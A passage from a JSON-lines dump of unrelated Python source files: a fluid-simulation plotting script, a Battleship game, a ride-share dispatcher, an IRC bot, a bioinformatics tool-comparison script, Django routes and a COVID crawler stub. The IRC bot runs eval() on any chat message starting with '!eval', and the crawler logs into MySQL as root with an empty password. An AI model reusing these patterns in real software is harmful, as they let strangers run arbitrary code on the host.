float(l[1])\n seg.append([float(l[0]), float(l[5]), float(l[6])])\n else:\n seg = []\n return seg\n \n\n def plot_legend(plt,time, xmin, ymin, xmax, ymax):\n #import case as case\n str_undim = 'log(Mo) = -3.65\\nEo =41.86\\nNf = 134.93\\n$\\\\rho_r=934$\\n$\\mu_r=2906$'\n plt.axes().text(xmin - 2.8, (ymin+0.5), \n str_undim,\n bbox={'facecolor':'white'}, \n fontname='monospace',\n )\n str_time = r'$t^*$ = %.2f' % (time-14.1) \n plt.axes().text(xmin - 2.8, (ymin-0.1), \n str_time,bbox={'facecolor':'white'}, \n fontname='monospace',\n color='r'\n )\n\n def plot_streamline(plt,sur,a,time,ex,y_lim,y_max,head,tail):\n from scipy.interpolate import griddata\n ax = plt.gca()\n soa =np.array(sur) \n x,y,u,v = zip(*soa)\n nx, ny =1000, 1000\n yn = np.array([-val for val in y])\n pts = np.vstack((x, y)).T\n ptsi = np.vstack((x, yn)).T\n vals = np.vstack((u, v)).T\n # lower-parts\n xi = np.linspace(-4,8,1000)\n yi = np.linspace(0,ex[i]*0.5+0.08 ,1000)\n yni = np.linspace(-ex[i]*0.5-0.08,0,1000)\n ipts = np.vstack(a.ravel() for a in np.meshgrid(yi, xi)[::-1]).T\n iptsi= np.vstack(a.ravel() for a in np.meshgrid(yni, xi)[::-1]).T\n ivals = griddata(pts, vals, ipts, method='cubic')\n ivalsi = griddata(ptsi, vals, iptsi, method='cubic')\n ui, vi = ivals.T\n ui_i,vi_i = ivalsi.T\n ui.shape = vi.shape = (ny, nx)\n ui_i.shape = vi_i.shape = (ny, nx)\n time_1 = time*100 + 1\n b = int(time_1)\n # upper-parts\n\n c = ex[i]*0.5\n\n ### define the position and range of the streamlines\n stream_points_1 = np.array(zip(np.arange(0.5,0,-0.1), np.arange(head+0.1-8,tail-1-8,-.1))) # x>0 for lower tube\n stream_points_2 = np.array(zip(np.arange(c,0.55,-0.1), np.arange(0,4,.1))) # x>0 for upper tube\n stream_points_3 = np.array(zip(np.arange(-0.5,0,0.1), np.arange(head+0.1-8,tail-1-8,-.1))) # x<0 for lower tube\n stream_points_4 = np.array(zip(np.arange(-c,-0.55,0.1), np.arange(0,4,.1))) # x<0 for upper tube\n\n # vortex near bubble tail\n stream_points_5 = np.array(zip(np.arange(-0.05,0,0.05), np.arange(tail-8.1,tail-8.15,-.05)))\n stream_points_6 = np.array(zip(np.arange(0.05,0,-0.05), np.arange(tail-8.1,tail-8.15,-.05)))\n # vortex inside bubble \n stream_points_7 = np.array(zip(np.arange(0.2,0,-0.1), np.arange(tail-7.5,head-9.5,.1)))\n stream_points_8 = np.array(zip(np.arange(-0.2,0,0.1), np.arange(tail-7.5,head-9.5,.1)))\n\n\n\n #### draw streamlines\n ax.streamplot(yi, xi, vi-a[b][2], ui-a[b][1], color = 'k',start_points=stream_points_1, arrowsize = 0.3,linewidth = 0.5,density =20)\n ax.streamplot(yi, xi, vi-a[b][2], ui-a[b][1], color = 'k',start_points=stream_points_2, arrowsize = 0.3,linewidth = 0.5,density =20)\n\n ax.streamplot(yni, xi, a[b][2] - vi_i, ui_i-a[b][1], color = 'k',start_points=stream_points_3, arrowsize = 0.3,linewidth = 0.5,density =20,integration_direction='both')\n ax.streamplot(yni, xi, a[b][2] - vi_i, ui_i-a[b][1], color = 'k',start_points=stream_points_4, arrowsize = 0.3,linewidth = 0.5,density =20,integration_direction='forward')\n\n ax.streamplot(yi, xi, vi-a[b][2], ui-a[b][1], color = 'k',start_points=stream_points_6, arrowsize = 0.3,linewidth = 0.5,density=20,integration_direction='both')\n ax.streamplot(yni, xi, a[b][2] - vi_i, ui_i-a[b][1], color = 'k',start_points=stream_points_5, arrowsize = 0.3,linewidth = 0.5,density =20,integration_direction='both')\n\n ax.streamplot(yi, xi, vi-a[b][2], ui-a[b][1], color = 'k',start_points=stream_points_7, arrowsize = 0.3,linewidth = 0.5,density =20,integration_direction='both')\n ax.streamplot(yni, xi, a[b][2] - vi_i, ui_i-a[b][1], color = 'k',start_points=stream_points_8, arrowsize = 0.3,linewidth = 0.5,density =20,integration_direction='both')\n \n \n def simulation(a):\n\n time_begin = 8.9\n time_end = 30\n \n\n for time in np.arange(time_begin,time_end,1):\n\n plt.figure(figsize=(4, 4))\n\n \"\"\"\n Set labels\n \"\"\"\n #plt.xlabel(r'$r/D$')\n #plt.ylabel(r'$(z_h - z)/D$')\n #plt.axis('off')\n \"\"\"\n Set range\n \"\"\"\n #plt.xscale('log')\n #plt.yscale('log')\n # plt.ylim([0,0.5])\n\n sur1 = get_sur_1(time)\n sur2 = get_sur_2(time)\n #plot_velocity(plt,sur2)\n a = out_data('out')\n\n ex= [1.72,1.45,1.33,1.24,1.12,1,0.9,0.81,0.69] # expansion ratio\n \n # change interface name to float\n '''filename_list = os.listdir(CWP) \n for filename in filename_list: \n strlen = len(reply.encode(filename))\n str_reverse = filename[::-1] \n start = str.find(filename,\"-\") + 1 \n end = str.find(str_reverse,\"(\") \n end = strlen - end - 1\n apxstart = str.find(str_reverse,\".\") \n apxstart = - apxstart - 1 \n final_filename = filename[start:end] + filename[apxstart:]\n print('interface-'+filename[start:end]) \n print('interface=-1-:' + final_filename)'''\n \n \n \n xh1 = get_bubble_head(sur1)\n xh11 = get_bubble_tail(sur1)\n with open('data-{}'.format(i), 'aw') as f: \n f.write(\"%.1f %f %.4f\\n\" %(time, xh1, xh11))\n le1 = plot_sur(plt, sur1, 8, \"r\")\n \n \n ex_ratio = ex[1] \n #plt.title('$t = %.2f s$' %(0.04*(time-time_begin[i]) ))\n if ex_ratio in ex[:5]:\n expansion = ex_ratio + 0.08\n plt.xlim(-0.5*expansion,0.5*expansion)\n else:\n expansion = 1 + 0.08\n plt.xlim(-0.5*expansion,0.5*expansion)\n\n R_0 = 0.5\n R_ex = R_0*ex_ratio\n delta_ratio = (ex_ratio-1)\n delta_length = delta_ratio*R_0\n deg = [10,15,20,30,35,40,45]\n degree = deg[i]\n theta = degree*math.pi/180\n R_out = (delta_length)/(pow(math.sin(theta),2)*2) \n delta_x = delta_length/math.tan(theta)\n #xx = (8+pow(2*0.3*R_0*R_out - pow(delta_length,2),1/2))\n #xx = (8+pow((2*0.3*R_out - pow(delta_length,2)),1/2)) \n #print(delta_x,R_out,xx)\n yy = [-2,-4.5,-3,-3,-2.5,-2.5,-2,-2]\n \n y_min = xh11 - 8.5\n y_max = xh1 - 7.5\n plt.yticks((np.arange(int(y_min), y_max+0.5, step=1)),fontsize = '18')\n plt.xticks(fontsize = '15')\n #plot_streamline(plt,sur2,a,time,ex,y_min,y_max,xh1,xh11)\n\n plt.ylim(y_min,y_max)\n \n if y_min < 0:\n y1 = math.fabs(y_min )/(y_max - y_min)\n y_2 = math.fabs(y_min - delta_x )/(y_max - y_min)\n elif y_min < delta_x and y_min > 0:\n y1 = 0\n y_2 = math.fabs(y_min- delta_x )/(y_max - y_min)\n else:\n y1 = 0\n y_2 = 0\n x1 = math.fabs(0.5*expansion+0.5)/expansion\n x2 = math.fabs(0.5+expansion)/expansion - 0.08\n x3 = 0\n x4 = (0.5*expansion-0.5 )/expansion\n \n plt.axvline(x = 0.5,ymin = 0, ymax = y1, color='b')\n plt.axvline(x = -0.5,ymin = 0, ymax = y1, color='b')\n plt.axvline(x = 0.5*ex_ratio,ymin = y_2, ymax = 1, color='b')\n plt.axvline(x = -0.5*ex_ratio,ymin = y_2, ymax = 1, color='b')\n \n #plot_legend(plt, time, -0.5, y_min, 0.5, y_max)\n plt.axhspan(xmin = x1,xmax = x2,ymin = y_min,ymax = 0,facecolor = 'w',alpha = 1)\n plt.axhspan(xmin = x3,xmax = x4,ymin = y_min,ymax = 0,facecolor = 'w',alpha = 1)\n #plt.gca().add_patch(Arc((x1, y1), 5, 5, theta1=0, theta2=-110, linewidth=2, zorder=0,color=\"k\"))\n \n from matplotlib import patches\n\n # set the points\n \n # calculate the arc\n mxmy = [R_0 + R_out, 0]\n mx1my1 = [-R_out - R_0, 0]\n width = 2*R_out\n height = 2*R_out\n width_1 = 2*R_out\n height_1 = 2*R_out\n start_angle = 180\n end_angle =-2*deg[i]\n start_angle_1 = 2*deg[i]\n end_angle_1 = -2*deg[i]\n # draw\n plt.gca().add_patch(Arc(mxmy, width, height, start_angle, end_angle,color=\"b\",lw = 1.5))\n plt.gca().add_patch(Arc(mx1my1, width_1, height_1, start_angle_1, end_angle_1,color=\"b\",lw=1.5))\n \n\n #plt.legend([le1,le2,le3], [\"$h = 1/64$\",\"$h = 1/128$\",\"$h = 1/256$\"], loc=\"upper right\", bbox_to_anchor=(-0.3,1))\n\n #plt.axhline(xh11-xh1,xmin=0.7,xmax=1.2,color='b')\n #plt.annotate('$z_{head}$',xy=(0,0),xytext=(-0.5,0),weight='bold',color='r',arrowprops=dict(arrowstyle='->',connectionstyle='arc3',color='k'))\n #plt.annotate('$z_{tail}$',xy=(0.35,xh33-xh3),xytext=(-0.2,xh33-xh3-0.05),weight='bold',color='r',arrowprops=dict(arrowstyle='->',connectionstyle='arc3',color='k'))\n\n # plt.grid(True)\n version = matplotlib.__version__\n\n plt.axes().set_aspect('equal')\n plt.tight_layout()\n\n name = \"basilisk_\" + \"%g\"% (4*(time- time_begin))\n #fn = os.path.join(PATH_FIG, (name + \".png\"))\n fn = os.path.join(PATH_FIG, (name + \".pdf\"))\n pdf = PdfPages(fn.format(version))\n #plt.savefig(file_path + '.png', dpi=Vc.dpi)\n #fig = plt.figure()\n #fig.savefig(fn, dpi = fig.dpi)\n plt.savefig(fn, format='pdf', bbox_inches='tight')\n plt.close() \n \n # plt.show()\n\n\n def main():\n simulation(a)\n\n\n if __name__ == '__main__':\n print(\"-----start-----\")\n main() \n print(\"-----finished!!!-----\")\n except ValueError:\n pass\n i += 1\n","sub_path":"taylor-bubble/taylor-2D/post/python/concave-parabolic-expansion.py","file_name":"concave-parabolic-expansion.py","file_ext":"py","file_size_in_byte":19538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"130265355","text":"import random\r\ntabuleiro = [\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']\r\n]\r\nnavio_humano = '█'\r\nnavio_enemigo = '#'\r\ntiro = 'X'\r\nacertos_humano = 0\r\nacertos_enemigo = 0\r\n\r\ndef mostrar_tabuleiro():\r\n print('Tabuleiro: ')\r\n for linha in range(0, 10):\r\n for coluna in range(0, 10):\r\n if existe_navio_humano(linha, coluna):\r\n print(navio_humano*2, end='') \r\n else:\r\n print(tabuleiro[linha][coluna]*2, end='')\r\n print()\r\n\r\ndef existe_navio_humano(linha, coluna): \r\n if linha==y1h and coluna == x1h or linha==y2h and coluna == x2h or linha==y3h and coluna == x3h:\r\n return True \r\n else:\r\n return False\r\n\r\nx1h = y1h = x2h = y2h = x3h = y3h = 0\r\nx1e = y1e = x2e = y2e = x3e = y3e = 0\r\nfim_jogo = False\r\n\r\ndef gera_coordenada():\r\n return random.randrange(9)\r\n\r\ndef ler_coordenada(coordenada):\r\n return int(input(f'Digite a coordenada {coordenada} (de 0 a 9): '))\r\n\r\ndef validar_beiradas(x1, y1, x2, y2, x3, y3):\r\n if validar_beirada(x1, y1) and validar_beirada(x2, y2) and validar_beirada(x3, y3):\r\n return True\r\n else:\r\n return False\r\n\r\ndef validar_beirada(x, y):\r\n if x>8 or x<0:\r\n return False\r\n if y>8 or y<0:\r\n return False\r\n return True\r\n\r\ndef validar_sequencia(x1, y1, x2, y2, x3, y3):\r\n if x1+1==x2 and x1+2==x3 and y1==y2 and y1==y3:\r\n return True\r\n if y1+1==y2 and y1+2==y3 and x1==x2 and x1==x3:\r\n return True\r\n if x1-1==x2 and x1-2==x3 and y1==y2 and y1==y3:\r\n return True\r\n if y1-1==y2 and y1-2==y3 and x1==x2 and x1==x3:\r\n return True \r\n return False\r\n\r\ndef validar_coordenadas(x1, y1, x2, y2, x3, y3): \r\n if validar_sequencia(x1, y1, x2, y2, x3, y3) and validar_beiradas(x1, y1, x2, y2, x3, y3):\r\n return True\r\n else:\r\n return False\r\n\r\ndef ler_coordenadas():\r\n global x1h, y1h, x2h, y2h, x3h, y3h \r\n x1h = ler_coordenada('primeiro x')\r\n y1h = ler_coordenada('primeiro y')\r\n x2h = ler_coordenada('segundo x')\r\n y2h = ler_coordenada('segundo y')\r\n x3h = ler_coordenada('terceiro x')\r\n y3h = ler_coordenada('terceiro y')\r\n\r\ndef informar_coordenadas_jogador_humano():\r\n ler_coordenadas()\r\n while not validar_coordenadas(x1h, y1h, x2h, y2h, x3h, y3h):\r\n print('Coordenadas inválidas! Devem ser contínuas!')\r\n ler_coordenadas()\r\n\r\ndef validar_coordenada_em_cima(x1e, y1e):\r\n if x1e == x1h and y1e == y1h:\r\n return False\r\n if x1e == x2h and y1e == y2h:\r\n return False\r\n if x1e == x3h and y1e == y3h:\r\n return False\r\n return True\r\n\r\ndef gerar_coordenadas_jogador_enemigo():\r\n global x1e, y1e, x2e, y2e, x3e, y3e\r\n x1e = gera_coordenada()\r\n y1e = gera_coordenada() \r\n while not validar_coordenada_em_cima(x1e, y1e):\r\n x1e = gera_coordenada()\r\n y1e = gera_coordenada() \r\n\r\n # Alinhar para cima\r\n\r\n x3e = x2e = x1e\r\n y2e = y1e-1\r\n y3e = y1e-2 \r\n if not validar_coordenada_em_cima(x2e, y2e) or not validar_coordenada_em_cima(x3e, y3e) or not validar_coordenadas(x1e, y1e, x2e, y2e, x3e, y3e):\r\n \r\n # Alinhar para direita\r\n y3e = y2e = y1e\r\n x2e = x1e+1\r\n x3e = x1e+2 \r\n if not validar_coordenada_em_cima(x2e, y2e) or not validar_coordenada_em_cima(x3e, y3e) or not validar_coordenadas(x1e, y1e, x2e, y2e, x3e, y3e):\r\n \r\n # Alinhar para baixo\r\n x3e = x2e = x1e \r\n y2e = y1e+1\r\n y3e = y1e+2\r\n if not validar_coordenada_em_cima(x2e, y2e) or not validar_coordenada_em_cima(x3e, y3e) or not validar_coordenadas(x1e, y1e, x2e, y2e, x3e, y3e):\r\n \r\n # Alinhar para esquerda\r\n y3e = y2e = y1e\r\n x2e = x1e-1\r\n x3e = x1e-2 \r\n\r\ndef verificar_acertou_tiro(xa, ya, xb, yb):\r\n if xa == xb and ya == yb:\r\n return True\r\n else:\r\n return False\r\n\r\ndef vez_humano():\r\n\r\n global acertos_humano\r\n\r\n x = int(input('Digite a coordenada x para atirar:'))\r\n y = int(input('Digite a coordenada y para atirar:'))\r\n\r\n while not validar_beirada(x, y):\r\n\r\n print('Deve ser um valor entre 0 e 9')\r\n x = int(input('Digite a coordenada x para atirar:'))\r\n y = int(input('Digite a coordenada y para atirar:'))\r\n\r\n if verificar_acertou_tiro(x, y, x1e, y1e) or verificar_acertou_tiro(x, y, x2e, y2e) or verificar_acertou_tiro(x, y, x3e, y3e):\r\n print('Acertou o enemigo!')\r\n\r\n tabuleiro[y][x] = navio_enemigo\r\n acertos_humano += 1\r\n\r\n else:\r\n print('Errou o tiro!')\r\n\r\n tabuleiro[y][x] = tiro\r\n\r\n if acertos_humano == 3:\r\n return True\r\n else:\r\n return False\r\n\r\ndef vez_enemigo():\r\n global acertos_enemigo\r\n # Se ele acertou antes, ao invés de sortear a coordenada x, y, você deve atirar na região próxima onde acertou\r\n # if acertos_enemigo > 0:\r\n # ....\r\n x = random.randrange(0, 10)\r\n y = random.randrange(0, 10) \r\n\r\n while not validar_tiro_enemigo(x, y):\r\n\r\n x = random.randrange(0, 10)\r\n y = random.randrange(0, 10) \r\n\r\n if verificar_acertou_tiro(x, y, x1h, y1h) or verificar_acertou_tiro(x, y, x2h, y2h) or verificar_acertou_tiro(x, y, x3h, y3h):\r\n print('O enemigo te acertou!')\r\n\r\n acertos_enemigo += 1\r\n tabuleiro[y][x] = tiro\r\n\r\n if acertos_enemigo == 3:\r\n return True\r\n else:\r\n return False\r\n\r\ndef validar_tiro_enemigo(x, y):\r\n\r\n if (tabuleiro[y][x] == ' ' or tabuleiro[y][x] == navio_humano) and tabuleiro[y][x] != navio_enemigo:\r\n return True\r\n else:\r\n return False\r\n\r\ninformar_coordenadas_jogador_humano()\r\ngerar_coordenadas_jogador_enemigo()\r\nmostrar_tabuleiro()\r\n\r\nwhile not fim_jogo:\r\n #print('Coordenadas Humano:', x1h, y1h, x2h, y3h, x3h, y3h)\r\n #print('Coordenadas Enemigo:', x1e, y1e, x2e, y2e, x3e, y3e)\r\n ganhou_humano = vez_humano()\r\n mostrar_tabuleiro() \r\n\r\n if ganhou_humano:\r\n\r\n print('Humano Ganhou!') \r\n else:\r\n\r\n ganhou_enemigo = vez_enemigo()\r\n mostrar_tabuleiro() \r\n\r\n if ganhou_enemigo:\r\n\r\n print('Enemigo Ganhou!')\r\n \r\n if ganhou_humano or ganhou_enemigo:\r\n\r\n fim_jogo = True\r\n","sub_path":"Batalha_Naval.py","file_name":"Batalha_Naval.py","file_ext":"py","file_size_in_byte":6331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"354510769","text":"from driver import Driver\nfrom rider import Rider\nfrom container import Queue\nfrom location import Location\n\n\nclass Dispatcher:\n \"\"\"A dispatcher fulfills requests from riders and drivers for a\n ride-sharing service.\n\n When a rider requests a driver, the dispatcher assigns a driver to the\n rider. If no driver is available, the rider is placed on a waiting\n list for the next available driver. A rider that has not yet been\n picked up by a driver may cancel their request.\n\n When a driver requests a rider, the dispatcher assigns a rider from\n the waiting list to the driver. If there is no rider on the waiting list\n the dispatcher does nothing. Once a driver requests a rider, the driver\n is registered with the dispatcher, and will be used to fulfill future\n rider requests.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize a Dispatcher.\n\n @type self: Dispatcher\n @rtype: None\n \"\"\"\n self._driving_fleet = Queue()\n self._waiting_riders = Queue()\n\n def __str__(self):\n \"\"\"Return a string representation.\n\n @type self: Dispatcher\n @rtype: str\n\n >>> d = Dispatcher()\n >>> rider1 = Rider('Riley', Location(1,3), Location(1,5), 3)\n >>> rider2 = Rider('Ryan', Location(2,5), Location(1,5), 3)\n >>> d.request_driver(rider1)\n >>> d.request_driver(rider2)\n >>> driver1 = Driver('Stephen', Location(1,2), 3)\n >>> print(d.request_rider(driver1))\n Riley\n >>> print(d)\n Available Drivers: ['Stephen'] | Waiting Riders: ['Ryan']\n \"\"\"\n return 'Available Drivers: {} | Waiting Riders: {}'.format(\n self._driving_fleet, self._waiting_riders)\n\n def request_driver(self, rider):\n \"\"\"Return a driver for the rider, or None if no driver is available.\n\n Add the rider to the waiting list if there is no available driver.\n\n @type self: Dispatcher\n @type rider: Rider\n @rtype: Driver | None\n\n >>> d = Dispatcher()\n >>> driver1 = Driver('Stephen', Location(1,2), 3)\n >>> driver2 = Driver('Ayesha', Location(2,4), 3)\n >>> d.request_rider(driver1)\n >>> d.request_rider(driver2)\n >>> rider1 = Rider('Riley', Location(1,3), Location(1,5), 3)\n >>> rider2 = Rider('Ryan', Location(2,5), Location(1,5), 3)\n >>> print(d.request_driver(rider1))\n Stephen\n >>> print(d.request_driver(rider2))\n Ayesha\n \"\"\"\n if self._driving_fleet.is_empty():\n self._waiting_riders.add(rider)\n return None\n else:\n driver = None\n\n for i in self._driving_fleet._items:\n if driver is None and i.is_idle:\n driver = i\n elif driver is not None:\n if ((i.get_travel_time(rider.origin) <\n driver.get_travel_time(rider.origin)\n and i.is_idle)):\n driver = i\n\n return driver\n\n def request_rider(self, driver):\n \"\"\"Return a rider for the driver, or None if no rider is available.\n\n If this is a new driver, register the driver for future rider requests.\n\n @type self: Dispatcher\n @type driver: Driver\n @rtype: Rider | None\n\n >>> d = Dispatcher()\n >>> rider1 = Rider('Riley', Location(1,3), Location(1,5), 3)\n >>> rider2 = Rider('Ryan', Location(2,5), Location(1,5), 3)\n >>> d.request_driver(rider1)\n >>> d.request_driver(rider2)\n >>> driver1 = Driver('Stephen', Location(1,2), 3)\n >>> driver2 = Driver('Ayesha', Location(2,4), 3)\n >>> print(d.request_rider(driver2))\n Riley\n >>> print(d.request_rider(driver1))\n Ryan\n \"\"\"\n if driver not in self._driving_fleet:\n self._driving_fleet.add(driver)\n\n if self._waiting_riders.is_empty():\n return None\n else:\n return self._waiting_riders.remove()\n\n def cancel_ride(self, rider):\n \"\"\"Cancel the ride for rider.\n\n @type self: Dispatcher\n @type rider: Rider\n @rtype: None\n\n >>> d = Dispatcher()\n >>> rider1 = Rider('Riley', Location(1,3), Location(1,5), 3)\n >>> rider2 = Rider('Ryan', Location(2,5), Location(1,5), 3)\n >>> d.request_driver(rider1)\n >>> d.request_driver(rider2)\n >>> d.cancel_ride(rider1)\n >>> print(d._waiting_riders)\n ['Ryan']\n \"\"\"\n index = 0\n\n for i in self._waiting_riders._items:\n if i == rider:\n del self._waiting_riders._items[index]\n index += 1\n","sub_path":"dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":4698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"147145360","text":"#ircbot.py\n#Built off of ECHO, an IRC bot written by Robert Szutak\n#https://gist.github.com/RobertSzkutak/1326452\n\n#Features:\n#Python eval system\n#Logging the chat?\n#\tLogs on a per-day basis\n#\tLogged with timestamps\n#\tLogs everything; connections, msgs, /me's, disconnects\n#\tEverytime someone disconnects or connects, read out the names list\n\n\nimport socket\n\nhost = \"irc.freenode.net\"\nport = 6667\n\nIDENT = \"foobar\"\nnick = \"Kirbot\"\nrealname = \"Jordan\"\nmaster = \"ultimamax\"\n\nreadbuffer = \"\"\nircsock = socket.socket( )\nircsock.connect((host, port))\n\nircsock.send(bytes(\"NICK %s\\r\\n\" % nick, \"UTF-8\"))\nircsock.send(bytes(\"USER %s %s bla :%s\\r\\n\" % (IDENT, host, realname), \"UTF-8\"))\nircsock.send(bytes(\"JOIN #_LaG\\r\\n\", \"UTF-8\"));\n\ndef privmsg(target, msg):\n\tprint(\"[SENT]: \" + msg)\n\tircsock.send(bytes(\"PRIVMSG %s %s \\r\\n\" % (target, msg), \"UTF-8\"))\n\ndef command(message):\n\targs = message.split(\" \")\n\tcmd = \"\"\n\ttry:\n\t\tcmd = args[0]\n\t\tcmd = cmd.lstrip(\"!\")\n\texcept Exception:\n\t\tpass\n\tif cmd == \"eval\":\n\t\tinstr = message.lstrip(\"!\"+cmd+\" \") #input string to eval\n\t\tresult = eval(instr)\n\t\tprivmsg(\"#_LaG\", \"$ \" + instr)\n\t\tprivmsg(\"#_LaG\", \"* \" + str(result))\n\n\nwhile 1:\n\treadbuffer += ircsock.recv(1024).decode(\"utf-8\")\n\ttemp = readbuffer.split(\"\\n\")\n\tprint(readbuffer)\n\treadbuffer = temp.pop()\n\tfor line in temp:\n\t\tline = line.rstrip()\n\t\tline = line.split()\n\n\t\tif line[0] == \"PING\":\n\t\t\tircsock.send(bytes(\"PONG %s\\r\\n\" % line[1], \"UTF-8\"))\n\t\tif line[1] == \"PRIVMSG\":\n\t\t\tsender = \"\"\n\t\t\tfor char in line[0]: #works out who sender is from line[0]\n\t\t\t\tif char == \"!\":\n\t\t\t\t\tbreak\n\t\t\t\tif char != \":\":\n\t\t\t\t\tsender += char\n\t\t\tsize = len(line)\n\t\t\ti = 3\n\t\t\tmessage = \"\"\n\t\t\twhile i < size: #line[3] and beyond is the message\n\t\t\t\tmessage += line[i] + \" \"\n\t\t\t\ti += 1\n\t\t\tmessage = message.lstrip(\":\")\n\t\t\tif line[2] == \"#_LaG\":\n\t\t\t\tif message[0] == \"!\":\n\t\t\t\t\tcommand(message)\n\t\t\telse:\n\t\t\t\tircsock.send(bytes(\"PRIVMSG %s %s \\r\\n\" % (sender, message), \"UTF-8\"))\n","sub_path":"ircbot.py","file_name":"ircbot.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"257999998","text":"import myparallel as mp\nimport os\nimport glob\nimport argparse\nfrom mylogmsg import logm, logwarn\n\nclass Compare(mp.myparallel):\n\n http_prestr = 'http://172.16.0.171/~liang/'\n\n def __init__(self, **argv):\n super().__init__(**argv)\n\n def setupTaskPool(self, task_pool):\n if not os.path.isdir('clipped'):\n os.makedirs('clipped')\n for fasta_f in sorted(list(glob.glob('*.fasta'))):\n # for fastx_clipper\n fxcn = 'clipped/{:s}_fastxclip_clipped.fasta'.format(fasta_f[:-6])\n task_pool.append(mp.Task(\n name=fasta_f[:-6],\n task_type='fastx_clipper',\n command=[\n 'fastx_clipper',\n '-a', 'TCGTATGCCGTCTTCTGCTTGT',\n '-l', '18',\n '-i', fasta_f, \n '-c', '-v',\n '-o', fxcn,\n ]))\n\n # for cutadapt\n cdpn = 'clipped/{:s}_cutadapt_clipped.fasta'.format(fasta_f[:-6])\n task_pool.append(mp.Task(\n name=fasta_f[:-6],\n task_type='cutadapt',\n command=[\n 'cutadapt',\n '-a', 'TCGTATGCCGTCTTCTGCTTGT',\n '--trimmed-only',\n '-m', '18',\n '-o', cdpn,\n '--untrimmed-output=\\\n clipped/{:s}_cutadapt_notrim.fasta'.format(fasta_f[:-6]),\n fasta_f\n ]))\n\n def output(self, lastTime=False):\n # original output function\n super.output(lastTime)\n\n # link all the ouptput to ~/public_html/log/// \n home_log_dir = os.path.join('~/public_html/log', self.name)\n if not os.path.exists(home_log_dir):\n os.makedirs(home_log_dir)\n sim_dir = os.path.join(home_log_dir, mp.strTime(self.start_time))\n logm('Create symbolic link at for log files at', sim_dir)\n\n abs_logdir = os.path.dirname(os.path.realpath(self.output_filename))\n if os.exists(sim_dir) and not os.path.samefile(sim_dir, abs_logdir):\n if os.path.islink(sim_dir):\n os.rename(sim_dir, sim_dir + '.backup')\n logwarn('link exists. Backup link as {:s}.backup -> {:s}'\n .format(sim_dir,\n os.path.realpath(os.path.expanduser(sim_dir))))\n else:\n os.rename(sim_dir, sim_dir + '.backup') \n logwarn('file or dir exists. Backup as{:s}.backup'\n .format(sim_dir))\n elif not os.exists(sim_dir):\n os.symlink(abs_logdir, mp.strTime(self.start_time), \n target_is_directory=True, dir_fd=home_log_dir)\n \n\ndef makeParser():\n ap = argparse.ArgumentParser\n parser = ap(prog='CLIP_COMP',\n description='Compare different clipping tool',\n parents=[mp.parser])\n return parser\n\ndef run():\n parser = makeParser()\n args = parser.parse_args()\n if args.max_process == 1:\n args.max_process = 0\n Compare(**vars(args))\n\nif __name__ == '__main__':\n run() \n \n","sub_path":"clip_tools_compare.py","file_name":"clip_tools_compare.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"510661458","text":"# encoding=utf8\nfrom django.conf.urls import url\nfrom django.contrib.auth import views as auth_views\n\nfrom . import views\n\nurlpatterns = [\n url(r'^login/$', auth_views.login, {'template_name': 'chiffee/login.html'}, name='login'),\n url(r'^logout/$', auth_views.logout, {'next_page': '/'}, name='logout'),\n url(r'^home/$', views.showoverview, name='home'),\n url(r'^money/$', views.showmoney, name='money'),\n url(r'^prod/$', views.showproducts, name='prod'),\n url(r'^history/$', views.showhistory, name='history'),\n url(r'^timeout/$', views.timeout, name='timeout'),\n url(r'^balance/$', views.balance, name='balance'),\n \n \n url(r'^$', views.users, name='index'),\n url(r'^(?P[0-9,a-z,A-Z,\\s]+)/$', views.products, name='products'),\n url(r'^(?P[0-9,a-z,A-Z,\\s]+)/(?P[0-9,a-z,A-Z,\\-,\\.,\\,\\s]+)/$', views.confirm, name='confirm'),\n url(r'^(?P[0-9,a-z,A-Z,\\s]+)/(?P[0-9,a-z,A-Z,\\-,\\.,\\,\\s]+)/(?P[0-9]+)$', views.confirmed, name='confirmed'),\n\n]\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"266225119","text":"\"\"\"\n@ProjectName: DXY-2019-nCoV-Crawler\n@FileName: script.py\n@Author: Jiabao Lin\n@Date: 2020/1/31\n\"\"\"\nfrom git import Repo\nfrom pymongo import MongoClient\nimport pymysql\nimport os\nimport json\nimport time\nimport logging\nimport datetime\nimport requests\nimport pandas as pd\n\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(message)s')\nlogger = logging.getLogger(__name__)\n\ndb = pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"yiiPractice\",charset=\"utf8\")\n\n#键是想要保存的文件名,值是对应的url模块\ncollections = {\n 'DXYOverall': 'overall',\n 'DXYArea': 'area',\n 'DXYNews': 'news',\n 'DXYRumors': 'rumors'\n}\n\ntime_types = ('pubDate', 'createTime', 'modifyTime', 'dataInfoTime', 'crawlTime', 'updateTime')\n\n#将document和city_dict中的内容全部导入result字典并且返回\ndef dict_parser(document, city_dict=None):\n result = dict()\n\n try:\n result['continentName'] = document['continentName']\n result['continentEnglishName'] 